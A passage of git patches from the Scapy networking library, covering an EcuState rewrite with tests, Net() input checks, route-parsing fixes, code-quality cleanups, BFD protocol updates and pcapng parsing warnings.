"".join(str(k) + str(v) for k, v in + sorted(self.__dict__.items(), key=lambda t: t[0])) def __eq__(self, other): - return other.session == self.session and other.tp == self.tp and \ - other.misc == self.misc and \ - self.security_level == other.security_level + # type: (object) -> bool + other = cast(EcuState, other) + if len(self.__dict__) != len(other.__dict__): + return False + try: + return all(self.__dict__[k] == other.__dict__[k] + for k in self.__dict__.keys()) + except KeyError: + return False + + def __contains__(self, item): + # type: (EcuState) -> bool + if not isinstance(item, EcuState): + return False + if len(self.__dict__) != len(item.__dict__): + return False + try: + return all(ov == sv or (hasattr(sv, "__iter__") and ov in sv) + for sv, ov in + zip(self.__dict__.values(), item.__dict__.values())) + except (KeyError, TypeError): + return False def __ne__(self, other): + # type: (object) -> bool return not other == self def __lt__(self, other): - if self.session == other.session: - return len(self.misc) < len(other.misc) - return self.session < other.session + # type: (EcuState) -> bool + if self == other: + return False + + if len(self.__dict__.keys()) < len(other.__dict__.keys()): + return True + + if len(self.__dict__.keys()) > len(other.__dict__.keys()): + return False + + common = set(self.__dict__.keys()).intersection( + set(other.__dict__.keys())) + + for k in sorted(common): + if not isinstance(other.__dict__[k], type(self.__dict__[k])): + raise TypeError( + "Can't compare %s with %s for the EcuState element %s" % + (type(self.__dict__[k]), type(other.__dict__[k]), k)) + if self.__dict__[k] < other.__dict__[k]: + return True + if self.__dict__[k] > other.__dict__[k]: + return False + + if len(common) < len(self.__dict__): + self_diffs = set(self.__dict__.keys()).difference( + set(other.__dict__.keys())) + other_diffs = set(other.__dict__.keys()).difference( + set(self.__dict__.keys())) + + for s, o in zip(self_diffs, other_diffs): + if s < o: + return True + + return False + + raise TypeError("EcuStates should be identical. Something bad happen. " + "self: %s other: %s" % (self.__dict__, other.__dict__)) def __hash__(self): + # type: () -> int return hash(repr(self)) - def __repr__(self): - tps = "_TP" if self.tp else "" - sl = "_SL%d" % self.security_level if self.security_level else "" - ks = "_" + "_".join(self.misc.keys()) if len(self.misc) else "" - return "%d%s%s%s" % (self.session, tps, sl, ks) + def reset(self): + # type: () -> None + keys = list(self.__dict__.keys()) + for k in keys: + del self.__dict__[k] + + def command(self): + # type: () -> str + return "EcuState(" + ", ".join( + ["%s=%s" % (k, repr(v)) for k, v in sorted( + self.__dict__.items(), key=lambda t: t[0])]) + ")" class Ecu(object): @@ -141,6 +210,9 @@ def communication_control(self, cc): def reset(self): self.state.reset() + self.state.session = 1 + self.state.security_level = 0 + self.state.communication_control = 0 def update(self, p): if isinstance(p, PacketList): diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index 42770aa713e..9c2f5dafb33 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -9,6 +9,10 @@ ~ conf command = Load modules + +import copy +import itertools + load_contrib("isotp", globals_dict=globals()) load_contrib("automotive.uds", globals_dict=globals()) load_contrib("automotive.gm.gmlan", globals_dict=globals()) @@ -19,6 +23,293 @@ conf.contribs["CAN"]["swap-bytes"] = True load_contrib("automotive.ecu", globals_dict=globals()) ++ EcuState Basic checks + += Check EcuState basic functionality + +state = EcuState() +state["session"] = 2 +state["securityAccess"] = 4 +print(repr(state)) +assert repr(state) == "securityAccess4session2" + += More complex tests + +state = EcuState(ses=4) +assert state.ses == 4 +state.ses = 5 +assert state.ses == 5 + += Even more complex tests + +state = EcuState(myinfo="42") + +state.ses = 5 +assert state.ses == 5 + +state["ses"] = None +assert state.ses is None + +state.ses = 5 +assert 5 == state.ses + +assert "42" == state.myinfo +assert repr(state) == "myinfo42ses5" + + + += Copy tests + +state = EcuState(myinfo="42") +state.ses = 5 + +ns = copy.copy(state) + +ns.ses = 6 + +assert ns.ses == 6 +assert state.ses == 5 +assert ns.myinfo == "42" + + += Move tests + +state = EcuState(myinfo="42") +state.ses = 5 + +ns = state + +ns.ses = 6 + +assert ns.ses == 6 +assert state.ses == 6 +assert ns.myinfo == "42" + += equal tests + +state = EcuState(myinfo="42") +state.ses = 5 + +ns = copy.copy(state) + +assert state == ns +assert hash(state) == hash(ns) + +ns.ses = 6 + +assert state != ns +assert hash(state) != hash(ns) + +ns.ses = 5 + +assert state == ns +assert hash(state) == hash(ns) + +ns.sa = 5 + +assert state != ns +assert hash(state) != hash(ns) + + += hash tests + +state = EcuState(myinfo="42") +state.ses = 5 + +ns = copy.copy(state) + +assert hash(state) == hash(ns) + +ns.ses = 6 + +assert hash(state) != hash(ns) + +ns.ses = 5 + +assert hash(state) == hash(ns) + +ns.sa = 5 + +assert hash(state) != hash(ns) + += command tests + +state = EcuState(myinfo="42") +state.ses = 5 + +state.command() +assert "EcuState(myinfo='42', ses=5)" == state.command() + += less than tests + +s1 = EcuState() +s2 = EcuState() + +s1.a = 1 +s2.a = 2 + +assert s1 < s2 + +s1.b = 4 + +assert s1 > s2 + +s2.b = 1 + +assert s1 < s2 + +s1.a = 2 + +assert s1 > s2 + += less than tests 2 + +s1 = EcuState() +s2 = EcuState() + +s1.c = "x" +s2.c = 4 +exception = False + +try: + assert s1 < s2 +except TypeError: + exception = True + +assert exception + += less than tests 3 + +s1 = EcuState() +s2 = EcuState() + + +s1.A = 1 +s1.a = 2 + +s2.A = 2 +s2.a = 1 + +assert s1 < s2 + += less than tests 4 + +s1 = EcuState() +s2 = EcuState() + + +s1.A = 1 +s1.a = 2 + +s2.A = 2 +s2.b = 100 + +assert s1 < s2 + += less than tests 5 + +s1 = EcuState() +s2 = EcuState() + + +s1.A = 100 +s1.a = 2 + +s2.A = 2 +s2.b = 100 + +assert s1 > s2 + += less than tests 6 + +s1 = EcuState() +s2 = EcuState() + + +s1.A = 100 +s1.B = 200 + +s2.a = 2 +s2.b = 1 + +assert s1 < s2 + += contains test + +s1 = EcuState(ses=[1,2,3]) +s2 = EcuState(ses=1) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=[2,3]) +s2 = EcuState(ses=1) + +assert s1 != s2 +assert s2 not in s1 +assert s1 not in s2 + + +s1 = EcuState(ses=[1,2,3], security=5) +s2 = EcuState(ses=1) + +assert s1 != s2 +assert s2 not in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(3), security=5) +s2 = EcuState(ses=1, security=5) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(3), security=(x for x in range(1, 10, 2))) +s2 = EcuState(ses=1, security=5) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=[1,2,3]) +s2 = EcuState(ses=[1,2,3]) + +assert s1 in s2 +assert s2 in s1 +assert s1 == s2 + +s1 = EcuState(ses=range(3), security=range(5)) +for ses, sec in itertools.product(range(3), range(5)): + s2 = EcuState(ses=ses, security=sec) + assert s1 != s2 + assert s2 in s1 + assert s1 not in s2 + + +s1 = EcuState(ses=[0, 1, 2], security=[43, 44]) +for ses, sec in itertools.product(range(3), range(43, 45)): + s2 = EcuState(ses=ses, security=sec) + assert s1 != s2 + assert s2 in s1 + assert s1 not in s2 + +s1 = EcuState(ses=[0, 1, 2], security=["a", "b"]) +for ses, sec in itertools.product(range(3), (x for x in "ab")): + s2 = EcuState(ses=ses, security=sec) + assert s1 != s2 + assert s2 in s1 + try: + assert s1 not in s2 + except TypeError: + assert True + +s1 = [EcuState(ses=1), EcuState(ses=2), EcuState(ses=3)] +s2 = EcuState(ses=3) + +assert s2 in s1 +assert s1 not in s2 + + Basic checks = Check default init parameters From 5475b7d9e7fa39a0f85469fd6c50a305588ee9b4 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Mon, 15 Feb 2021 16:29:40 +0100 Subject: [PATCH 0513/1632] Raise a meaningful exception when Net() is used with wildcards or ranges --- scapy/base_classes.py | 23 +++++++++++++++++------ 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/scapy/base_classes.py b/scapy/base_classes.py index a8db11157c2..34701426848 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -17,6 +17,7 @@ import operator import os import random +import re import socket import struct import subprocess @@ -24,6 +25,7 @@ import warnings import scapy +from scapy.error import Scapy_Exception from scapy.consts import WINDOWS import scapy.modules.six as six @@ -114,12 +116,18 @@ class Net(Gen[str]): @classmethod def name2addr(cls, name): # type: (str) -> str - return next( - addr_port[0] - for family, _, _, _, addr_port in - socket.getaddrinfo(name, None, cls.family) - if family == cls.family - ) + try: + return next( + addr_port[0] + for family, _, _, _, addr_port in + socket.getaddrinfo(name, None, cls.family) + if family == cls.family + ) + except socket.error: + if re.search("(^|\\.)[0-9]+-[0-9]+($|\\.)", name) is not None: + raise Scapy_Exception("Ranges are no longer accepted in %s()" % + cls.__name__) + raise @classmethod def ip2int(cls, addr): @@ -135,6 +143,9 @@ def int2ip(val): def __init__(self, net, stop=None): # type: (str, Union[None, str]) -> None + if "*" in net: + raise Scapy_Exception("Wildcards are no longer accepted in %s()" % + self.__class__.__name__) if stop is None: try: net, mask = net.split("/", 1) From c38a4782928aaa0e657c41638ce1f469aac2edb1 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 10 Feb 2021 11:54:31 +0100 Subject: [PATCH 0514/1632] GHCI: set fetch-depth=2 for codecov --- .github/workflows/unittests.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 298032c76de..f752bb92e0f 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -85,6 +85,9 @@ jobs: steps: - name: Checkout Scapy uses: actions/checkout@v2 + # Codecov requires a fetch-depth > 1 + with: + fetch-depth: 2 - name: Setup Python uses: actions/setup-python@v2 with: From b4b48b3f441e07c1edb6d039417368592067a9be Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 20 Feb 2021 14:01:00 +0100 Subject: [PATCH 0515/1632] Strip ifconfig error message --- scapy/arch/bpf/core.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index 4ff71b4eb5e..c8e77e8765d 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -70,7 +70,7 @@ def get_if_raw_addr(ifname): ) stdout, stderr = subproc.communicate() if subproc.returncode: - warning("Failed to execute ifconfig: (%s)", plain_str(stderr)) + warning("Failed to execute ifconfig: (%s)", plain_str(stderr).strip()) return b"\0\0\0\0" # Get IPv4 addresses @@ -108,7 +108,7 @@ def get_if_raw_hwaddr(ifname): stdout, stderr = subproc.communicate() if subproc.returncode: raise Scapy_Exception("Failed to execute ifconfig: (%s)" % - (plain_str(stderr))) + plain_str(stderr).strip()) # Get MAC addresses addresses = [ From 2eb883fc26155f009933d83ad24a692e2956bd23 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 20 Feb 2021 14:02:08 +0100 Subject: [PATCH 0516/1632] Incorrect comment spacing --- scapy/arch/bpf/core.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index c8e77e8765d..d49267cd911 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -72,8 +72,8 @@ def get_if_raw_addr(ifname): if subproc.returncode: warning("Failed to execute ifconfig: (%s)", plain_str(stderr).strip()) return b"\0\0\0\0" - # Get IPv4 addresses + # Get IPv4 addresses addresses = [ line.strip() for line in plain_str(stdout).splitlines() if "inet " in line From 6f519be9ba90363af7cca56471e2a845dc51a226 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 20 Feb 2021 14:03:18 +0100 Subject: [PATCH 0517/1632] Test get_if_addr() errors --- scapy/arch/unix.py | 11 +++++------ test/regression.uts | 39 ++++++++++++++++++++++++++++++++++----- 2 files changed, 39 insertions(+), 11 deletions(-) diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index 8a06faa0d7a..7d9d4b7f1c4 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -118,23 +118,22 @@ def read_routes(): from scapy.arch import get_if_addr try: ifaddr = get_if_addr(netif) - routes.append((dest, netmask, gw, netif, ifaddr, metric)) - except OSError as exc: - if 'Device not configured' in str(exc): + if ifaddr == "0.0.0.0": # This means the interface name is probably truncated by # netstat -nr. We attempt to guess it's name and if not we # ignore it. guessed_netif = _guess_iface_name(netif) if guessed_netif is not None: ifaddr = get_if_addr(guessed_netif) - routes.append((dest, netmask, gw, guessed_netif, ifaddr, metric)) # noqa: E501 + netif = guessed_netif else: log_runtime.info( "Could not guess partial interface name: %s", netif ) - else: - raise + routes.append((dest, netmask, gw, netif, ifaddr, metric)) + except OSError: + raise else: pending_if.append((dest, netmask, gw)) f.close() diff --git a/test/regression.uts b/test/regression.uts index 26bf1a02cae..89ddf7b6a8c 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2312,7 +2312,7 @@ default link#11 UCSI 1 0 bridge1 def se_get_if_addr(iface): """Perform specific side effects""" if iface == "bridge1": - raise OSError("Device not configured") + return "0.0.0.0" return "1.2.3.4" mock_get_if_addr.side_effect = se_get_if_addr # Test the function @@ -2449,9 +2449,10 @@ test_osx_10_15_ipv4() import mock from io import StringIO +@mock.patch("scapy.arch.get_if_addr") @mock.patch("scapy.arch.unix.OPENBSD") @mock.patch("scapy.arch.unix.os") -def test_openbsd_6_3(mock_os, mock_openbsd): +def test_openbsd_6_3(mock_os, mock_openbsd, mock_get_if_addr): """Test read_routes() on OpenBSD 6.3""" # 'netstat -rn -f inet' output netstat_output = u""" @@ -2481,6 +2482,16 @@ default 10.0.1.254 UGS 0 0 - 8 bge0 # Mocked OpenBSD parsing behavior mock_openbsd = True + + # Mocked get_if_addr() output + def se_get_if_addr(iface): + """Perform specific side effects""" + import socket + if iface == "bge0": + return "192.168.122.42" + return "10.0.1.26" + mock_get_if_addr.side_effect = se_get_if_addr + # Test the function from scapy.arch.unix import read_routes return read_routes() @@ -2510,9 +2521,10 @@ from io import StringIO # Mocked Solaris 11.1 parsing behavior +@mock.patch("scapy.arch.get_if_addr") @mock.patch("scapy.arch.unix.SOLARIS", True) @mock.patch("scapy.arch.unix.os") -def test_solaris_111(mock_os): +def test_solaris_111(mock_os, mock_get_if_addr): """Test read_routes() on Solaris 11.1""" # 'netstat -rvn -f inet' output netstat_output = u""" @@ -2528,6 +2540,15 @@ default 0.0.0.0 10.0.2.2 net0 1500 2 UG mock_os.popen = mock.MagicMock(return_value=strio) print(scapy.arch.unix.SOLARIS) + # Mocked get_if_addr() output + def se_get_if_addr(iface): + """Perform specific side effects""" + import socket + if iface == "net0": + return "10.0.2.15" + return "127.0.0.1" + mock_get_if_addr.side_effect = se_get_if_addr + # Test the function from scapy.arch.unix import read_routes return read_routes() @@ -2849,9 +2870,10 @@ test_freebsd_10_2() import mock from io import StringIO - + +@mock.patch("scapy.arch.get_if_addr") @mock.patch("scapy.arch.unix.os") -def test_freebsd_13(mock_os): +def test_freebsd_13(mock_os, mock_get_if_addr): """Test read_routes() on FreeBSD 13""" # 'netstat -rnW -f inet' output netstat_output = u""" @@ -2867,6 +2889,13 @@ default 10.0.0.1 UGS 3 1500 vtnet0 # Mocked file descriptor strio = StringIO(netstat_output) mock_os.popen = mock.MagicMock(return_value=strio) + # Mocked get_if_addr() behavior + def se_get_if_addr(iface): + """Perform specific side effects""" + if iface == "vtnet0": + return "10.0.0.1" + return "1.2.3.4" + mock_get_if_addr.side_effect = se_get_if_addr # Test the function from scapy.arch.unix import read_routes routes = read_routes() From a4dcd78cd81045ad857ce5a22e1ab41d13df2c7a Mon Sep 17 00:00:00 2001 From: Ankit Dobhal Date: Tue, 23 Feb 2021 16:12:15 -0500 Subject: [PATCH 0518/1632] Chore : fixed code quality issues (#3111) --- .deepsource.toml | 10 ++++++++++ scapy/contrib/diameter.py | 10 +++++----- scapy/contrib/http2.py | 6 ++---- scapy/layers/dns.py | 2 +- scapy/layers/http.py | 2 +- scapy/layers/inet6.py | 2 +- scapy/layers/snmp.py | 4 +--- scapy/layers/tftp.py | 9 +++------ scapy/layers/tls/automaton_cli.py | 3 +-- scapy/layers/tls/handshake.py | 6 ++---- scapy/packet.py | 2 +- scapy/sendrecv.py | 2 +- test/contrib/automotive/interface_mockup.py | 2 +- 13 files changed, 30 insertions(+), 30 deletions(-) create mode 100644 .deepsource.toml diff --git a/.deepsource.toml b/.deepsource.toml new file mode 100644 index 00000000000..d51c102b1a8 --- /dev/null +++ b/.deepsource.toml @@ -0,0 +1,10 @@ +version = 1 + +test_patterns = ["test/**"] + +[[analyzers]] +name = "python" +enabled = true + + [analyzers.meta] + runtime_version = "3.x.x" diff --git a/scapy/contrib/diameter.py b/scapy/contrib/diameter.py index ff72cc538b7..e99cb4249dd 100644 --- a/scapy/contrib/diameter.py +++ b/scapy/contrib/diameter.py @@ -85,7 +85,7 @@ def i2repr(self, pkt, x): return "None" res = hex(int(x)) r = '' - cmdt = (x & 128) and ' Request' or ' Answer' + cmdt = ' Request' if (x & 128) else ' Answer' if x & 15: # Check if reserved bits are used nb = 8 offset = 0 @@ -353,7 +353,7 @@ def GuessAvpType(p, **kargs): avpCode = struct.unpack("!I", p[:AVP_Code_length])[0] vnd = bool(struct.unpack( "!B", p[AVP_Code_length:AVP_Code_length + AVP_Flag_length])[0] & 128) # noqa: E501 - vndCode = vnd and struct.unpack("!I", p[8:12])[0] or 0 + vndCode = struct.unpack("!I", p[8:12])[0] if vnd else 0 # Check if vendor and code defined and fetch the corresponding AVP # definition if vndCode in AvpDefDict: @@ -430,7 +430,7 @@ def AVP(avpId, **fields): if val: fields['avpFlags'] = val[2] else: - fields['avpFlags'] = vnd and 128 or 0 + fields['avpFlags'] = 128 if vnd else 0 # Finally, set the name and class if possible if val: classType = val[1] @@ -4799,12 +4799,12 @@ def getCmdParams(cmd, request, **fields): drAppId = next(iter(params[2])) # The first record is taken fields['drAppId'] = drAppId # Set the command name - name = request and params[0] + '-Request' or params[0] + '-Answer' + name = params[0] + '-Request' if request else params[0] + '-Answer' # Processing of flags (only if not provided manually) if 'drFlags' not in fields: if drAppId in params[2]: flags = params[2][drAppId] - fields['drFlags'] = request and flags[0] or flags[1] + fields['drFlags'] = flags[0] if request else flags[1] return (fields, name) diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index cf93e241349..1328db595a2 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -1887,8 +1887,7 @@ def __init__(self, *args, **kwargs): # RFC7540 par6.7 p42 assert( len(args) == 0 or ( - (isinstance(args[0], bytes) or - isinstance(args[0], str)) and + isinstance(args[0], (bytes, str)) and len(args[0]) == 8 ) ), 'Invalid ping frame; length is not 8' @@ -1931,8 +1930,7 @@ def __init__(self, *args, **kwargs): # RFC7540 par6.9 p46 assert( len(args) == 0 or ( - (isinstance(args[0], bytes) or - isinstance(args[0], str)) and + isinstance(args[0], (bytes, str)) and len(args[0]) == 4 ) ), 'Invalid window update frame; length is not 4' diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index d42db9d2d51..b1c9f456c12 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -271,7 +271,7 @@ def __init__(self, name, default, rr): def _countRR(self, pkt): x = getattr(pkt, self.rr) i = 0 - while isinstance(x, DNSRR) or isinstance(x, DNSQR) or isdnssecRR(x): + while isinstance(x, (DNSRR, DNSQR)) or isdnssecRR(x): x = x.payload i += 1 return i diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 615a9acfb3b..c79b6d1ac17 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -263,7 +263,7 @@ def _dissect_headers(obj, s): continue obj.setfieldval(f.name, value) if headers: - headers = {key: value for key, value in six.itervalues(headers)} + headers = dict(six.itervalues(headers)) obj.setfieldval('Unknown_Headers', headers) return first_line, body diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 149781fa667..f5c9bd33d49 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -3684,7 +3684,7 @@ def reply_callback(req, reply_mac, router, iface): reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac - router = (router and 1) or 0 # Value of the R flags in NA + router = 1 if router else 0 # Value of the R flags in NA sniff(store=0, filter=sniff_filter, diff --git a/scapy/layers/snmp.py b/scapy/layers/snmp.py index 6505995db5c..b4285a2eaa7 100644 --- a/scapy/layers/snmp.py +++ b/scapy/layers/snmp.py @@ -269,9 +269,7 @@ class SNMP(ASN1_Packet): def answers(self, other): return (isinstance(self.PDU, SNMPresponse) and - (isinstance(other.PDU, SNMPget) or - isinstance(other.PDU, SNMPnext) or - isinstance(other.PDU, SNMPset)) and + isinstance(other.PDU, (SNMPget, SNMPnext, SNMPset)) and self.PDU.id == other.PDU.id) diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index c5e1ad38003..2e3077d9cb8 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -83,7 +83,7 @@ class TFTP_ACK(Packet): def answers(self, other): if isinstance(other, TFTP_DATA): return self.block == other.block - elif isinstance(other, TFTP_RRQ) or isinstance(other, TFTP_WRQ) or isinstance(other, TFTP_OACK): # noqa: E501 + elif isinstance(other, (TFTP_RRQ, TFTP_WRQ, TFTP_OACK)): # noqa: E501 return self.block == 0 return 0 @@ -109,10 +109,7 @@ class TFTP_ERROR(Packet): StrNullField("errormsg", "")] def answers(self, other): - return (isinstance(other, TFTP_DATA) or - isinstance(other, TFTP_RRQ) or - isinstance(other, TFTP_WRQ) or - isinstance(other, TFTP_ACK)) + return isinstance(other, (TFTP_DATA, TFTP_RRQ, TFTP_WRQ, TFTP_ACK)) def mysummary(self): return self.sprintf("ERROR %errorcode%: %errormsg%"), [UDP] @@ -123,7 +120,7 @@ class TFTP_OACK(Packet): fields_desc = [] def answers(self, other): - return isinstance(other, TFTP_WRQ) or isinstance(other, TFTP_RRQ) + return isinstance(other, (TFTP_WRQ, TFTP_RRQ)) bind_layers(UDP, TFTP, dport=69) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 976538c2182..2b251b1d90a 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -125,8 +125,7 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, self.local_port = None self.socket = None - if (isinstance(client_hello, TLSClientHello) or - isinstance(client_hello, TLS13ClientHello)): + if isinstance(client_hello, (TLSClientHello, TLS13ClientHello)): self.client_hello = client_hello else: self.client_hello = None diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 15c3527da72..ca97b12aff6 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -180,8 +180,7 @@ def __init__(self, name, default, dico, length_from=None, itemfmt="!H"): s2i[dico[k]] = k def any2i_one(self, pkt, x): - if (isinstance(x, _GenericCipherSuite) or - isinstance(x, _GenericCipherSuiteMetaclass)): + if isinstance(x, (_GenericCipherSuite, _GenericCipherSuiteMetaclass)): x = x.val if isinstance(x, bytes): x = self.s2i[x] @@ -230,8 +229,7 @@ def i2len(self, pkt, i): class _CompressionMethodsField(_CipherSuitesField): def any2i_one(self, pkt, x): - if (isinstance(x, _GenericComp) or - isinstance(x, _GenericCompMetaclass)): + if isinstance(x, (_GenericComp, _GenericCompMetaclass)): x = x.val if isinstance(x, str): x = self.s2i[x] diff --git a/scapy/packet.py b/scapy/packet.py index 6b060d8fa0c..3d585465355 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1863,7 +1863,7 @@ def hashret(self): def answers(self, other): # type: (NoPayload) -> bool - return isinstance(other, NoPayload) or isinstance(other, conf.padding_layer) # noqa: E501 + return isinstance(other, (NoPayload, conf.padding_layer)) # noqa: E501 def haslayer(self, cls, _subclass=None): # type: (Union[Type[Packet], str], Optional[bool]) -> int diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 24166665511..ec2a9d74c52 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -149,7 +149,7 @@ def __init__(self, self.notans = _flood[0] else: if isinstance(pkt, types.GeneratorType) or prebuild: - self.tobesent = [p for p in pkt] + self.tobesent = list(pkt) self.notans = len(self.tobesent) else: self.tobesent = ( diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 00c2b3e5ffb..6e851e95de0 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -162,7 +162,7 @@ def exit_if_no_isotp_module(): sys.__stderr__.write(err) warning("Can't test ISOTPNativeSocket because " "kernel module isn't loaded") - exit(0) + sys.exit(0) # ############################################################################ From 4106e9f6991146791d75701936bfbfa88103c485 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Wed, 24 Feb 2021 21:45:20 +0100 Subject: [PATCH 0519/1632] Remove unneeded file --- .deepsource.toml | 10 ---------- 1 file changed, 10 deletions(-) delete mode 100644 .deepsource.toml diff --git a/.deepsource.toml b/.deepsource.toml deleted file mode 100644 index d51c102b1a8..00000000000 --- a/.deepsource.toml +++ /dev/null @@ -1,10 +0,0 @@ -version = 1 - -test_patterns = ["test/**"] - -[[analyzers]] -name = "python" -enabled = true - - [analyzers.meta] - runtime_version = "3.x.x" From f0e3e4452ec63618b09bad30b459b7eba09ebd6b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Perrin?= Date: Wed, 24 Feb 2021 17:18:13 +0000 Subject: [PATCH 0520/1632] BFD: handle more variant The flags field was listed in the wrong order, FlagsField expect the flags in LSB first order --- scapy/contrib/bfd.py | 44 ++++++++++++++++++++++++++++++++++---------- test/contrib/bfd.uts | 3 ++- 2 files changed, 36 insertions(+), 11 deletions(-) diff --git a/scapy/contrib/bfd.py b/scapy/contrib/bfd.py index f86abbad188..4dc16ecf6d8 100644 --- a/scapy/contrib/bfd.py +++ b/scapy/contrib/bfd.py @@ -4,26 +4,46 @@ # This program is published under GPLv2 license """ -BFD - Bidirectional Forwarding Detection - RFC 5880, 5881 +BFD - Bidirectional Forwarding Detection - RFC 5880, 5881, 7130, 7881 """ # scapy.contrib.description = BFD # scapy.contrib.status = loads from scapy.packet import Packet, bind_layers, bind_bottom_up -from scapy.fields import BitField, FlagsField, XByteField +from scapy.fields import BitField, BitEnumField, FlagsField, ByteField from scapy.layers.inet import UDP +_sta_names = {0: "AdminDown", + 1: "Down", + 2: "Init", + 3: "Up", + } + +# https://www.iana.org/assignments/bfd-parameters/bfd-parameters.xhtml +_diagnostics = { + 0: "No Diagnostic", + 1: "Control Detection Time Expired", + 2: "Echo Function Failed", + 3: "Neighbor Signaled Session Down", + 4: "Forwarding Plane Reset", + 5: "Path Down", + 6: "Concatenated Path Down", + 7: "Administratively Down", + 8: "Reverse Concatenated Path Down", + 9: "Mis-Connectivity Defect", +} + class BFD(Packet): name = "BFD" fields_desc = [ BitField("version", 1, 3), - BitField("diag", 0, 5), - BitField("sta", 3, 2), - FlagsField("flags", 0x00, 6, ['P', 'F', 'C', 'A', 'D', 'M']), - XByteField("detect_mult", 0x03), - XByteField("len", 24), + BitEnumField("diag", 0, 5, _diagnostics), + BitEnumField("sta", 3, 2, _sta_names), + FlagsField("flags", 0x00, 6, "MDACFP"), + ByteField("detect_mult", 3), + ByteField("len", 24), BitField("my_discriminator", 0x11111111, 32), BitField("your_discriminator", 0x22222222, 32), BitField("min_tx_interval", 1000000000, 32), @@ -38,6 +58,10 @@ def mysummary(self): ) -bind_bottom_up(UDP, BFD, dport=3784) -bind_bottom_up(UDP, BFD, sport=3784) -bind_layers(UDP, BFD, sport=3784, dport=3784) +for _bfd_port in [3784, # single-hop BFD + 4784, # multi-hop BFD + 6784, # BFD for LAG a.k.a micro-BFD + 7784]: # seamless BFD + bind_bottom_up(UDP, BFD, dport=_bfd_port) + bind_bottom_up(UDP, BFD, sport=_bfd_port) + bind_layers(UDP, BFD, dport=_bfd_port, sport=_bfd_port) diff --git a/test/contrib/bfd.uts b/test/contrib/bfd.uts index f6175cbd60c..88517005489 100644 --- a/test/contrib/bfd.uts +++ b/test/contrib/bfd.uts @@ -2,7 +2,8 @@ = BFD, basic instantiation -a = UDP()/BFD() +from scapy.contrib.bfd import BFD +a = UDP(sport=3784, dport=3784)/BFD() assert raw(a) == b'\x0e\xc8\x0e\xc8\x00 \x00\x00 \xc0\x03\x18\x11\x11\x11\x11"""";\x9a\xca\x00;\x9a\xca\x00;\x9a\xca\x00' = BFD - dissection From c42ea3335faee1fb16bb67585ad561e3a424786c Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 2 Mar 2021 01:29:57 +0100 Subject: [PATCH 0521/1632] Ensure that there is enough data to parse a SPB (#3103) * Ensure that there is enough data to parse a SPB * Ensure that there is enough data to parse a packet * Explicit warnings --- scapy/utils.py | 21 ++++++++++++++++----- test/regression.uts | 8 ++++++++ 2 files changed, 24 insertions(+), 5 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index db9d38f4dfd..4fde4c91ace 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1512,6 +1512,7 @@ def _read_block_idb(self, block, _): block[:8] ) + (options["tsresol"],) # type: Tuple[int, int, int] except struct.error: + warning("PcapNg: IDB is too small %d/8 !" % len(block)) raise EOFError self.interfaces.append(interface) @@ -1532,6 +1533,7 @@ def _read_block_epb(self, block, size): block[:20], ) except struct.error: + warning("PcapNg: EPB is too small %d/20 !" % len(block)) raise EOFError self._check_interface_id(intid) @@ -1551,7 +1553,12 @@ def _read_block_spb(self, block, size): intid = 0 self._check_interface_id(intid) - wirelen, = 